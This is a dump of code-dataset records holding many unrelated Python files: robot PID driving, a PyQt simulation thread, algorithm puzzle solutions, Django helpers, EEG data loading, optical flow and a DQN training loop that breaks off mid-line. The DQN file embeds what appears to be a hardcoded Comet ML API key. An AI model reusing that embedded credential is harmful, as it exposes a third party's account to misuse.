or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n\n#!usr/bin/python3\n\n'''\n\nAssessment Script, Drive in a square of side length 1 m\n\nPID CONTROLLED\n\n'''\n\nimport penguinPi as ppi\nimport time\nfrom wheel_encoders import get_distance\n\n\n\n#PID VARIABLES\n\nmainP = 3200.0\nmainI = 0.0\nmainD = 0.0\n\nmainP_turn = 5500.0\nmainI_turn = 0.0\nmainD_turn = 50.0\n\nspeed = 65 #try turn this down for more accuracy in straights?\nmax_speed = 100\nspeed_turn = 80\n\n\n#PID CLASS\n\nclass PID:\n\n\tdef __init__(self, P,I,D):\n\t\tself.Kp = P\n\t\tself.Ki = I\n\t\tself.Kd = D\n\t\tself.set_point=0.0\n\t\tself.error=0.0\n\t\tself.prevError= 0.0\n\t\tself.intAccum = 0.0\n\n\tdef update(self, current_value):\n\t\tself.error = self.set_point - current_value\n\t\tself.intAccum += self.error\n\t\tself.P_value = self.Kp * self.error\n\t\tself.D_value = self.Kd * (self.error - self.prevError)\n\t\tself.I_value = self.Ki * self.intAccum\n\t\tself.prevError = self.error\n\n\t\tOutput = self.P_value + self.D_value + self.I_value\n\t\treturn Output\n\n\tdef setPoint(self, set_point):\n\t\tself.set_point = set_point\n\n#create our device objects\n\nppi.init()\npid_out = PID(mainP,mainI,mainD)\npid_turn = PID(mainP_turn, mainI_turn, mainD_turn)\nmA = ppi.Motor(ppi.AD_MOTOR_A)\nmB = ppi.Motor(ppi.AD_MOTOR_B)\ndisplay = ppi.Display(ppi.AD_DISPLAY_A)\ndisplay.set_mode('u')\n\ndef driveMotors(speedA, speedB):\n\n\tmA.set_power(-speedA) #wheels facing fowards\n\tmB.set_power(speedB) #wheels facing fowards\n\t\ntry:\n\twhile True:\n\t\tinitial_ticksA = mA.get_ticks() \n\t\tinitial_ticksB = mB.get_ticks() \n\t\tticksA = (mA.get_ticks()) - initial_ticksA\n\t\tticksB = (mB.get_ticks()) - initial_ticksB\n\t\tdistances = get_distance(ticksA,ticksB)\n\t\tinitial_position = distances.return_distanceA()\n\t\tside = 1\n\t\twhile side == 1:\n\t\t\tticksA = (mA.get_ticks()) - initial_ticksA\n\t\t\tticksB = (mB.get_ticks()) - initial_ticksB\n\t\t\tdistances = get_distance(ticksA,ticksB)\n\t\t\tpositionA = abs(distances.return_distanceA())\n\t\t\tpositionB = abs(distances.return_distanceB())\n\t\t\twheel_error = abs((ticksA / 360) - (ticksB / 90))\n\t\t\tpid_return = abs(int(pid_out.update(wheel_error)))\n\t\t\tfoward_speed = speed - pid_return\n\t\t\t#create some thresholds for max speed\n\t\t\tif foward_speed > max_speed:\n\t\t\t\tfoward_speed = max_speed\n\t\t\tif foward_speed < -max_speed:\n\t\t\t\tfoward_speed = -max_speed\n\t\t\tif positionA >= positionB:\n\t\t\t\tdriveMotors(foward_speed, speed)\n\t\t\t\tprint('Moving Right, A: %s, B: %s' % (foward_speed, speed))\n\t\t\t\tprint('Wheel Error: %s' % wheel_error)\n\t\t\t\tprint('PID: %s' % pid_return)\n\t\t\tif positionA < positionB:\n\t\t\t\tdriveMotors(speed, foward_speed)\n\t\t\t\tprint('Moving Left, A: %s, B: %s' % (speed, foward_speed))\n\t\t\t\tprint('Wheel Error: %s' % wheel_error)\n\t\t\t\tprint('PID: %s' % pid_return)\n\t\t\tif (positionA - initial_position) >= 1:\n\t\t\t\tdriveMotors(0,0)\n\t\t\t\tside = 2\n\t\ttime.sleep(2)\n\t\tturn_init_position = distances.return_distanceA()\n\t\tinc = 0\n\t\tinitial_ticksA = mA.get_ticks()\n\t\tinitial_ticksB = mB.get_ticks()\n\t\twhile side == 2:\n\t\t\tticksA = (mA.get_ticks()) - initial_ticksA\n\t\t\tticksB = (mB.get_ticks()) - initial_ticksB\n\t\t\tpid_turn.setPoint(-0.303)\n\t\t\tdistances = get_distance(ticksA,ticksB)\n\t\t\tpositionA = abs(distances.return_distanceA())\n\t\t\tpositionB = abs(distances.return_distanceB())\n\t\t\twheel_error = abs(positionA - positionB)\n\t\t\tpid_return_turn = pid_turn.update(wheel_error)\n\t\t\tturn_speed = int(pid_return_turn)\n\t\t\tif turn_speed > speed_turn:\n\t\t\t\tturn_speed = speed_turn\n\t\t\tif turn_speed < -speed_turn:\n\t\t\t\tturn_speed = -speed_turn\n\t\t\tdriveMotors(-turn_speed,turn_speed)\n\t\t\tprint(\"turn: %s\" % int(pid_return_turn))\n\t\t\tif turn_speed < 20:\n\t\t\t\tinc = inc + 1\n\t\t\t\tif inc > 100:\n\t\t\t\t\tside = 1\n\t\t\t\t\tdriveMotors(0,0)\n\t\t\t\t\t\n\t\ttime.sleep(2)\n\t\t\t\nexcept KeyboardInterrupt:\n\tprint('Stopped!')\n\tdriveMotors(0,0)\n\t\t\t\n\t\n\n#decompose into left and right wheel velocities\n","sub_path":"SlamBot-modified-goaltracking/Core/encoder_drive/drive_square_flipped.py","file_name":"drive_square_flipped.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189335254","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom utils.sim import sim\nfrom main import MainWindow\nimport time\nimport csv\n\n#继承 QThread 类\nclass BigWorkThread(QThread):\n\n finishSignal = pyqtSignal(str)\n updateSignal = pyqtSignal(list)\n\n def __init__(self, workDistance, k, radian, wavelength,parent=None):\n super(BigWorkThread, self).__init__(parent)\n self.workDistance = workDistance\n self.k = k\n self.wavelength = wavelength\n self.radian = radian\n self.path = './data/'\n self.writeData = []\n\n\n def run(self):\n\n if self.k == 0.0 or self.radian == 0.0:\n QMessageBox.information(self, \"warning\", \"Please set the value of Radian or K\")\n else:\n while self.workDistance <= 10:\n simTest = sim(k=self.k, radian=self.radian, wavelength=632.8)\n\n startPoint = int(self.workDistance * 10000)\n self.I0, self.I = simTest.simluation(startPoint)\n self.writeData.append(self.I)\n\n if self.workDistance > 10:\n self.workDistance = 0\n else:\n self.workDistance += 0.1\n time.sleep(0.1)\n self.updateSignal.emit([self.I0, self.I, self.workDistance])\n\n self.finishSignal.emit(\"Finish\")\n self.save_data()\n self.workDistance = 0\n\n def save_data(self):\n\n f = open('./data/data_%f.csv' % 0.01, 'w')\n #with open('./data/data_%f.csv' % self.radian) as f:\n writer = csv.writer(f)\n for data in self.writeData:\n writer.writerow(data)\n f.close()\n\n f = open('./data/I0_data_%f.csv' % 0.01, 'w', newline='')\n # with open('./data/data_%f.csv' % self.radian) as f:\n writer = csv.writer(f)\n writer.writerow(self.I0)\n f.close()\n\n\n\n\n","sub_path":"tread.py","file_name":"tread.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149577330","text":"class Solution(object):\n def permuteUnique(self, nums):\n res = []\n nums = sorted(nums)\n self.helper(nums, res, [],0)\n print(res)\n return res\n def helper(self, nums, res, sub,index):\n # print(nums,sub, index)\n if sub :\n res.append(sub)\n for i in range(index,len(nums)):\n print(\"helper\")\n print(nums, res, sub+[nums[i]],i+1)\n self.helper(nums,res,sub+[nums[i]], i + 1)\nnums = [1,1,2,2,3]\nnums = [1,2,3]\nx = Solution().permuteUnique(nums)","sub_path":"permutation2.py","file_name":"permutation2.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248599972","text":"import sys\nfrom math import ceil, log2\nfrom bisect import bisect_right\nsys.setrecursionlimit(10**9)\nsys.stdin = open(\"7469_K번째 수.txt\", \"rt\")\n\n\nclass MergeSortTree:\n def __init__(self, data):\n self.data = data\n self.data_len = len(data)\n self.tree_height = int(ceil(log2(self.data_len)))\n self.tree = [[]] * (1 << (self.tree_height + 1))\n\n def build(self, node, left, right):\n if left == right:\n self.tree[node] = [self.data[left]]\n return self.tree[node]\n\n mid = (left + right) // 2\n left_arr = self.build(2 * node, left, mid)\n right_arr = self.build(2 * node + 1, mid + 1, right)\n self.tree[node] = self._merge(left_arr, right_arr)\n return self.tree[node]\n\n def _merge(self, left_arr, right_arr):\n merged_arr = []\n i, j = 0, 0\n while i < len(left_arr) and j < len(right_arr):\n if left_arr[i] <= right_arr[j]:\n merged_arr.append(left_arr[i])\n i += 1\n else:\n merged_arr.append(right_arr[j])\n j += 1\n while i < len(left_arr):\n merged_arr.append(left_arr[i])\n i += 1\n while j < len(right_arr):\n merged_arr.append(right_arr[j])\n j += 1\n return merged_arr\n\n def query(self, target, node, left, right, start, end):\n if start <= left and right <= end:\n return bisect_right(self.tree[node], target)\n if end < left or right < start:\n return 0\n mid = (left + right) // 2\n return self.query(target, 2*node, left, mid, start, end) + self.query(target, 2*node+1, mid+1, right, start, end)\n\n\ndef solution(n, m, arr, Q):\n tree = MergeSortTree(arr)\n tree.build(1, 0, n-1)\n for i, j, k in Q:\n left, right = int(-1e9), int(1e9)\n while left <= right:\n mid = (left + right) // 2\n cnt = tree.query(mid, 1, 0, n-1, i-1, j-1)\n if cnt < k:\n left = mid + 1\n else:\n right = mid - 1\n print(left)\n\n\nif __name__ == \"__main__\":\n input = sys.stdin.readline\n n, m = map(int, input().split())\n arr = list(map(int, input().split()))\n Q = [list(map(int, input().split())) for _ in range(m)]\n solution(n, m, arr, Q)\n\n","sub_path":"BaekJoon/단계별로 풀어보기/세그먼트 트리/7469_K번째 수.py","file_name":"7469_K번째 수.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"558738930","text":"from __future__ import division\n\ndef func(x, y):\n return 2 * (x**2 + y)\n\ndef main():\n h = 0.1\n x = 0\n y = 1\n n = 10\n for i in range(0, n):\n ytilda = y + ((x + h) - x) * func(x, y)\n y = y + (((x + h) - x) * (func(x, y) + func(x + h, ytilda)))/(2)\n x = x + h\n print(i)\n print('x is ', x)\n print('y is ', y)\nmain()","sub_path":"10/AylerPerech.py","file_name":"AylerPerech.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"168491390","text":"# coding: utf-8\n\n\ndef get_sort_field(request):\n \"\"\"\n Retrieve field used for sorting a queryset\n\n :param request: HTTP request\n :return: the sorted field name, prefixed with \"-\" if ordering is descending\n \"\"\"\n sort_direction = request.GET.get('dir')\n field_name = (request.GET.get('sort') or '') if sort_direction else ''\n sort_sign = '-' if sort_direction == 'desc' else ''\n result_field = \"{sign}{field}\".format(sign=sort_sign, field=field_name)\n return result_field\n","sub_path":"webstack_django_sorting/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587146433","text":"import pandas as pd\nimport numpy as np\nimport utilities.utils as utils\n\ndef col_names(balls):\n cols=['target','action','birdX', 'birdY']\n for i in range(0,balls):\n cols.append('ball'+str(i+1)+'X')\n cols.append('ball'+str(i+1)+'Y')\n print(\"Game cols length:\", len(cols))\n return cols\n\ndef load_data(drive, load_eeg, load_state, params):\n print(\"---Loading---\")\n\n # Load EEG data\n eeg_df = pd.read_csv(load_eeg+\".txt\", header=None, index_col=None)\n print(\"EEG raw shape:\", eeg_df.shape)\n\n # Load game data\n cols = col_names(balls=35) # target, action, birdX, birdY, 35*ballX, 35*Bally\n game_df = pd.read_csv(load_state, names=cols,header=None, index_col=None)\n print(\"Game state shape:\", game_df.shape)\n\n # Seperate EEG util and channel data\n eeg_utils = eeg_df.iloc[:,[0,8]].values\n eeg_df = eeg_df.drop([0,5,6,7,8], axis=1)\n eeg = eeg_df.values\n print(\"EEG Shapes:\", eeg.shape, eeg_utils.shape)\n\n # Extract game state and targets\n game_state = game_df.values\n game_tar = pd.get_dummies(game_df.iloc[:, 0]).values\n print(\"Game State Shapes:\", game_state.shape)\n\n # Quick check for missing samples\n if len(eeg)%params[-1]: print(\n \"-----SAMPLE RATE DID NOT DIVIDE LENGTH OF EEG DATA!-----\\n\" +\n \"-----MISSING SMAPLES ALERT!-----\")\n # Verbos check for missing samples\n missing_samps, missing_idx = utils.sample_validation(eeg_utils[:,0], params[-1]-1)\n # Fill in missing samples\n if len(missing_idx) > 0:\n for i in range(missing_samps[0]):\n print(eeg_utils[missing_idx[0]+i,0])\n eeg, eeg_utils = utils.sameple_fill(eeg, eeg_utils, missing_samps, missing_idx)\n\n return eeg, eeg_utils, game_state, game_tar\n","sub_path":"Pipeline/flappy_load.py","file_name":"flappy_load.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"578354066","text":"from collections import deque\r\nimport sys\r\n\r\ndirs = [(-1, 0), (1, 0), (0, -1), (0, 1)]\r\nq = deque()\r\n\r\ndef dfs(startV: int):\r\n x, y = startV\r\n chk[x][y] = 0\r\n q.append(startV)\r\n\r\n while q:\r\n x, y = q.pop()\r\n \r\n for move in dirs:\r\n moved_x, moved_y = x + move[0], y + move[1]\r\n\r\n if 0 <= moved_x < N and 0 <= moved_y < N:\r\n if chk[moved_x][moved_y] == 1:\r\n q.append((moved_x, moved_y))\r\n chk[moved_x][moved_y] = 0\r\n \r\n\r\nN = int(input())\r\nregion = []\r\n\r\nfor _ in range(N):\r\n region.append(list(map(int, sys.stdin.readline().split())))\r\n\r\nmaxPptn = max(map(max, region))\r\nmax_cnt = 0\r\nfor pptn in range(0, maxPptn):\r\n chk = [[0] * N for _ in range(N)]\r\n\r\n for i in range(N):\r\n for j in range(N):\r\n if region[i][j] - pptn > 0:\r\n chk[i][j] = 1\r\n else:\r\n chk[i][j] = 0\r\n cnt = 0\r\n for i in range(N):\r\n for j in range(N):\r\n if chk[i][j] == 1:\r\n dfs((i, j))\r\n cnt += 1\r\n max_cnt = max(max_cnt, cnt)\r\n\r\nprint(max_cnt)","sub_path":"geonhokim/6.Depth_First_Search/안전영역.py","file_name":"안전영역.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288975179","text":"# -*- encoding: utf-8 -*-\n#\n# The MIT License (MIT)\n#\n# Copyright (c) 2016-2018 Tobias Koch \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nimport threading\n\nfrom org.boltlinux.repository.debiansources import DebianSources\nfrom org.boltlinux.repository.boltsources import BoltSources\nfrom org.boltlinux.repository.boltpackages import BoltPackages\nfrom org.boltlinux.repository.boltpackagescan import BoltPackageScan\n\nclass RepoUpdater:\n\n def __init__(self, config):\n self._stop_flag = threading.Event()\n self._activate = threading.Event()\n self._condition = threading.Condition()\n\n self._tasks = [\n DebianSources(config),\n BoltSources(config),\n BoltPackages(config),\n BoltPackageScan(config)\n ]\n #end function\n\n def run(self):\n for t in self._tasks:\n t.start()\n\n while not self._stop_flag.is_set():\n for t in self._tasks:\n t.activate()\n while not self._stop_flag.is_set():\n if t.wait_until_done(0.250):\n break\n #end for\n\n with self._condition:\n while not self._stop_flag.is_set():\n if self._condition.wait_for(self._activate.is_set, 0.250):\n break\n self._activate.clear()\n #end with\n #end while\n\n for t in self._tasks:\n t.stop()\n for t in self._tasks:\n t.join()\n #end function\n\n def activate(self, *args):\n with self._condition:\n self._activate.set()\n\n def stop(self, *args):\n self._stop_flag.set()\n\n#end class\n","sub_path":"lib/org/boltlinux/repository/repoupdater.py","file_name":"repoupdater.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192596858","text":"# Problem 22\n# ==========\n\n\n# Using [1]names.txt, a 46K text file containing over five-thousand first\n# names, begin by sorting it into alphabetical order. Then working out the\n# alphabetical value for each name, multiply this value by its alphabetical\n# position in the list to obtain a name score.\n\n# For example, when the list is sorted into alphabetical order, COLIN, which\n# is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So,\n# COLIN would obtain a score of 938 x 53 = 49714.\n\n# What is the total of all the name scores in the file?\n\n\n# Answer: 871198282 calculated in 0.156455039978 seconds\n\nfrom euler import runtime\nfrom string import ascii_uppercase\n\n\ndef score_names(file, s=0):\n value = {c: ascii_uppercase.index(c) + 1 for c in ascii_uppercase}\n with open(file, 'r') as f:\n names = sorted(f.read().replace('\"', '').split(','))\n for name in names:\n score = 0\n for char in name:\n score += value[char]\n score *= names.index(name) + 1\n s += score\n return s\n\nruntime(score_names, 'txt/names.txt')\n","sub_path":"solutions/022.py","file_name":"022.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3824134","text":"from django.conf.urls import url\n\nfrom .views import (HttpCheckCreateView, HttpCheckUpdateView,\n duplicate_http_check)\n\nurlpatterns = [\n\n url(r'^httpcheck/create/', \n view=HttpCheckCreateView.as_view(),\n name='create-http-check'),\n\n url(r'^httpcheck/update/(?P\\d+)/',\n view=HttpCheckUpdateView.as_view(), \n name='update-http-check'),\n\n url(r'^httpcheck/duplicate/(?P\\d+)/',\n view=duplicate_http_check, \n name='duplicate-http-check'),\n]\n\n\n","sub_path":"cabot_check_http/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116787637","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"artist\", views.artist, name='artist'),\n path(\"artist/\", views.oneartist, name='artist'),\n path('album/', views.album, name='album'),\n path('album/', views.onealbum, name='album'),\n path('profile/', views.profile, name=\"profile\"),\n path('addsong', views.addsong, name=\"addsong\")\n]\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193129779","text":"#!/usr/bin/env python3\n\n#Author: Marta CICCARELLA\n#Univeristé Paris Diderot\n#Projet court: Septembre\n\n\n#import libraries\nimport numpy as np\n\n\n# define seq \n#seq = [\"H\", \"H\", \"P\", \"H\", \"P\", \"P\", \"H\"].\nseq = [\"a\", \"b\", \"c\", \"d\", \"e\"]\nprint(\"My sequence is:\", seq)\n\n# create a matrix\nside = 2*(len(seq))\nmatrix = np.chararray((side, side))\nmatrix[:] = ' '\n\n#integrate the sequence in the matrix \ni = int(side/2)\nj = int(side/2)\n\nfor k in range(0, len(seq)):\n matrix[i, j] = seq[k] \n j = j+1\n\nprint(matrix) \n\n#define a function that ckecks \n#if positions are available for each move \n#before moving\n\ndef move_right(i, j, matrix):\n if matrix[i, j+1] == '':\n i1 = i \n j1 = j+1\n return(i1, j1)\n else:\n return(i, j)\n\ndef move_left(i, j, matrix):\n if matrix[i, j-1] == '':\n i1 = i \n j1 = j-1\n return(i1, j1)\n else:\n return(i, j) \n\ndef move_up(i, j, matrix):\n if matrix[i+1, j] == '':\n i1 = i+1\n j1 = j\n return(i1, j1)\n else:\n return(i, j) \n\ndef move_down(i, j, matrix):\n if matrix[i-1, j] == '':\n i1 = i-1\n j1 = j\n return(i1, j1)\n else:\n return(i, j) \n\n#### define fold function\n\ndef fold(i, j):\n move = np.random.randint(4)\n if move == 0:\n i1, j1 = move_right(i, j, matrix)\n if (i1, j1) == (i, j):\n return fold(i, j)\n \n elif move == 1:\n i1, j1 = move_left(i, j, matrix)\n if (i1, j1) == (i, j):\n return fold(i, j)\n \n elif move == 2:\n i1, j1 = move_up(i, j, matrix)\n if (i1, j1) == (i, j):\n return fold(i, j)\n \n elif move == 3:\n i1, j1 = move_right(i, j, matrix)\n if (i1, j1) == (i, j):\n return fold(i, j)\n \n return(i1, j1)\n\nmatrix = np.chararray((side, side)) #reinitialize the matrix\nmatrix[:] = ' '\ni = int(side/2)\nj = int(side/2)\n#matrix[i, j] = seq[0] #start the sequence in the middle of the matrix\n\n#------fold one by one to check---------\n#i, j = fold(i, j)\n#matrix[i, j] = seq[1]\n\n#i, j = fold(i, j)\n#matrix[i, j] = seq[2]\n\n#i, j = fold(i, j)\n#matrix[i, j] = seq[3]\n\n#i, j = fold(i, j)\n#matrix[i, j] = seq[4]\n#----------------------------------------\n\n#fold the sequence in the matrix\nfor k in range(0, len(seq)):\n i, j = fold(i, j) \n matrix[i, j] = seq[k]\n print(i, j)\n\nprint(matrix)\n\n","sub_path":"code/second_attempt/code_mardi_2.py","file_name":"code_mardi_2.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119411379","text":"from PIL import Image, ImageDraw\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nfrom scipy import signal\nimport numpy.linalg as lin\n\n\ndef boxfilter(n):\n assert (n%2 != 0),\"Dimension must be odd\"\n a = np.empty((n, n))\n a.fill(1/(n*n))\n return a\n\ndef gauss1d(sigma):\n arr_length = 6*sigma\n if arr_length % 2 == 0:\n val = ((arr_length)/2)+1\n elif arr_length.is_integer() == False:\n arr_length = np.ceil(arr_length)\n val = (arr_length + 1)/2\n if arr_length % 2 == 0:\n arr_length = arr_length + 1\n val = arr_length - 1\n elif arr_length % 2 != 0:\n val = (arr_length + 1)/2\n lst = list(range(int(val)))\n neg_lst = [-x for x in lst]\n neg_lst.remove(0)\n neg_lst.reverse()\n a_val = neg_lst + lst\n a_val = [math.exp(- (abs(x)*abs(x)) / (2*sigma*sigma)) for x in a_val]\n sum_aval = sum(a_val)\n a_aval = [(1/sum_aval)*x for x in a_val]\n return np.asarray(a_aval)\n\ndef gauss2d(sigma):\n f = gauss1d(sigma)\n return signal.convolve2d(f[np.newaxis], np.transpose(f[np.newaxis]))\n\ndef gaussconvolve2d(array,sigma):\n assert (array.ndim == 2),\"Array must be 2D\"\n filter = gauss2d(sigma)\n result = signal.convolve2d(array, filter, 'same')\n return result\n\n\n\ndef boxconvolve2d(image, n):\n filter = boxfilter(n)\n result = signal.convolve2d(image, filter, 'same')\n return result\n\ndef Estimate_Derivatives(im1, im2, sigma=1.5, n=3):\n \n im1_smoothed = gaussconvolve2d(im1,sigma)\n Ix, Iy = np.gradient(im1_smoothed)\n It = boxconvolve2d(im1, n) - boxconvolve2d(im2, n)\n return Ix, Iy, It\n\ndef Optical_Flow(im1, im2, x, y, window_size, sigma=1.5, n=3):\n assert((window_size % 2) == 1) , \"Window size must be odd\"\n Ix, Iy, It = Estimate_Derivatives(im1, im2, sigma, n)\n half = np.floor(window_size/2)\n\n win_Ix = Ix[y-half-1:y+half, x-half-1:x+half].T.flatten()\n\n win_Iy = Iy[y-half-1:y+half, x-half-1:x+half].T.flatten()\n win_It = It[y-half-1:y+half, x-half-1:x+half].T.flatten()\n A = np.vstack([win_Ix, win_Iy])\n V = np.dot((-1)*win_It,np.dot(lin.pinv(np.dot(A.T,A)), A.T))\n\n return V[1], V[0]\n\ndef AppendImages(im1, im2):\n\n im1cols, im1rows = im1.size\n im2cols, im2rows = im2.size\n im3 = Image.new('RGB', (im1cols+im2cols, max(im1rows,im2rows)))\n im3.paste(im1,(0,0))\n im3.paste(im2,(im1cols,0))\n return im3\n\ndef DisplayFlow(im1, im2, x, y, uarr, varr):\n\n im3 = AppendImages(im1,im2)\n offset = im1.size[0]\n draw = ImageDraw.Draw(im3)\n xinit = x+uarr[0]\n yinit = y+varr[0]\n for u,v,ind in zip(uarr[1:], varr[1:], range(1, len(uarr))):\n draw.line((offset+xinit, yinit, offset+xinit+u, yinit+v),fill=\"red\",width=2)\n xinit += u\n yinit += v\n draw.line((x, y, offset+xinit, yinit), fill=\"yellow\", width=2)\n im3.show()\n del draw\n return im3\n\ndef HitContinue(Prompt='Hit any key to continue'):\n input(Prompt)\n\nx=278\ny=277\n\nwindow_size=17\n\n# sigma of the 2D Gaussian (used in the estimation of Ix and Iy)\nsigma=1.5\n\n# size of the boxfilter (used in the estimation of It)\nn = 3\n\n\n# scale factor for display of optical flow (to make result more visible)\nscale=10\n\nPIL_im1 = Image.open('frame07.png')\nPIL_im2 = Image.open('frame08.png')\nim1 = np.asarray(PIL_im1)\nim2 = np.asarray(PIL_im2)\ndx, dy = Optical_Flow(im1, im2, x, y, window_size, sigma, n)\nprint('Optical flow: [', dx, ',', dy, ']')\nplt.imshow(im1, cmap='gray')\nplt.hold(True)\nplt.plot(x,y,'xr')\nplt.plot(x+dx*scale,y+dy*scale, 'dy')\nprint('Close figure window to continue...')\nplt.show()\nuarr = [dx]\nvarr = [dy]\n\nprint('frame 7 to 8')\nDisplayFlow(PIL_im1, PIL_im2, x, y, uarr, varr)\nHitContinue()\n\nprev_im = im2\nxcurr = x+dx\nycurr = y+dy\noffset = PIL_im1.size[0]\n\nfor i in range(8, 14):\n im_i = 'frame%0.2d.png'%(i+1)\n print ('frame', i, 'to', (i+1))\n PIL_im_i = Image.open('%s'%im_i)\n numpy_im_i = np.asarray(PIL_im_i)\n dx, dy = Optical_Flow(prev_im, numpy_im_i, xcurr, ycurr, window_size, sigma, n)\n xcurr += dx\n ycurr += dy\n print(xcurr, ycurr)\n prev_im = numpy_im_i\n uarr.append(dx)\n varr.append(dy)\n #redraw the (growing) figure\n DisplayFlow(PIL_im1, PIL_im_i, x, y, uarr, varr)\n HitContinue()\n\n","sub_path":"assets/code/OPT.py","file_name":"OPT.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"161780271","text":"import numpy as np\nfrom comet_ml import Experiment\nimport torch\nfrom torch_rl.format import default_preprocess_obss\nfrom abc import ABC\nfrom collections import deque\nimport random\nfrom matplotlib import pyplot as plt\nimport math\nimport json, os, csv\nimport torch.nn.functional as F\n\nhyper_params = {\n \"learning_rate\": 0.01\n}\n\nexperiment = Experiment(\"UcVgpp0wPaprHG4w8MFVMgq7j\", project_name=\"navi-corl-2019\")\nexperiment.log_parameters(hyper_params)\n\n\nclass DQNAlgo_new(ABC):\n \"\"\"The class for the DQN\"\"\"\n\n def __init__(self, env, base_model, target_net, num_frames, discount=0.99, lr=0.005, adam_eps=1e-8,\n batch_size=128, preprocess_obss=None, capacity=10000, log_interval=100,\n save_interval=1000, train_interval=500, record_qvals=False, target_update=10):\n\n self.env = env\n self.base_model = base_model\n self.target_model = target_net\n self.base_model.train()\n self.discount = discount\n self.optimizer = torch.optim.SGD(self.base_model.parameters(), lr) #, eps=adam_eps)\n self.batch_size = batch_size\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.num_frames = num_frames\n self.preprocess_obss = preprocess_obss or default_preprocess_obss\n self.batch_num = 0\n self.replay_buffer = ReplayBuffer(capacity)\n\n self.episode_success = []\n self.all_rewards = []\n self.losses = []\n self.log_interval = log_interval\n self.save_interval = save_interval\n self.train_interval = train_interval\n self.target_update = target_update\n\n self.curriculum_threshold = 0.5\n\n self.qvals = []\n self.record_qvals = record_qvals\n\n epsilon_start = 1.0\n epsilon_final = 0.01\n epsilon_decay = 100000\n self.epsilon_by_frame = lambda frame_idx: epsilon_final + (epsilon_start - epsilon_final) \\\n * math.exp(-1. * frame_idx / epsilon_decay)\n\n def update_parameters(self, status, model_dir):\n num_frames = status['num_frames']\n episode_reward = 0\n episode_length = 0\n episode_length_list = []\n self.obs = self.env.reset()\n\n if self.record_qvals:\n orig_obs = self.obs\n experiment.log_metric(\"good_action_for_qvals\", self.env.shortest_path_length()[0])\n np.save(model_dir+\"/orig_obs.npy\", orig_obs)\n self.qvals.append(self.base_model(self.preprocess_obss([orig_obs], device=self.device)))\n\n\n for frame_idx in range(num_frames, self.num_frames):\n with experiment.train():\n\n preprocessed_obs = self.preprocess_obss([self.obs], device=self.device)\n epsilon = self.epsilon_by_frame(frame_idx)\n experiment.log_metric(\"epsilon\", epsilon, step=frame_idx)\n\n action = self.base_model.act(preprocessed_obs, epsilon)\n next_state, reward, done, _ = self.env.step(action)\n\n self.replay_buffer.push(self.obs, action, reward, next_state, done)\n self.obs = next_state\n\n episode_reward += reward\n episode_length += 1\n\n if len(self.replay_buffer) > self.batch_size and frame_idx % self.train_interval == 0:\n loss = self.compute_td_loss()\n self.losses.append(loss.item())\n experiment.log_metric(\"loss\", loss.item(), 